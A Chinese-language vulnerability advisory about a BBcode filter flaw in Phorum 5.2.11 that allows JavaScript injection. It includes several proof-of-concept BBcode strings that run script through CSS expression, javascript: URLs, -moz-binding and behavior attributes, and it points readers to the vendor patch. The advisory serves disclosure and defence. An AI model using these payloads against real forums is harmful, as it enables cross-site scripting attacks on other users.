Phorum过滤引擎HTML代码注入漏洞

安全
Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在Microsoft Windows操作系统下使用。 Phorum的过滤引擎没有充分地验证某些BBcode参数,远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码...

影响版本: Phorum 5.2.11

漏洞描述: BUGTRAQ: 35777  

Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在Microsoft Windows操作系统下使用。  Phorum的过滤引擎没有充分地验证某些BBcode参数,远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。<*参考   crashfr (crashfr@sysdream.com)http://milw0rm.com/exploits/9231  http://secunia.com/advisories/35928/ *>

测试方法: [www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG

安全建议: 厂商补丁: Phorum

目前厂商已经发布了升级补丁以修复这个安全问题。

请到厂商的主页下载: http://www.phorum.org/phorum5/read.php?64,139411

【编辑推荐】

  1. Macromedia ColdFusion日志条目HTML注入漏洞
  2. 多家厂商的web漏洞扫描程序存在HTML注入漏洞
  3. Rockliffe 邮件信息HTML注入漏洞
责任编辑:安泉 来源: 安全中国
相关推荐

2009-10-25 13:32:09

2017-09-07 15:39:27

2021-02-26 13:18:38

Node.js漏洞代码

2011-10-26 10:33:42

phpMyFAQ

2012-05-28 10:01:19

2012-12-19 10:36:06

2014-02-28 17:29:06

2011-08-23 13:37:47

2020-08-12 09:45:56

HTMLHTML注入漏洞

2010-03-12 16:19:11

Safari漏洞修复

2010-10-22 15:18:18

SQL注入漏洞

2009-02-12 10:14:16

2015-02-04 14:50:29

2009-11-02 13:47:09

2021-09-16 09:05:45

SQL注入漏洞网络攻击

2022-09-07 09:27:31

漏洞CICD管道网络攻击

2016-01-12 10:44:00

2013-12-02 09:35:10

2013-04-26 11:26:00

2010-09-14 19:50:55

点赞
收藏

51CTO技术栈公众号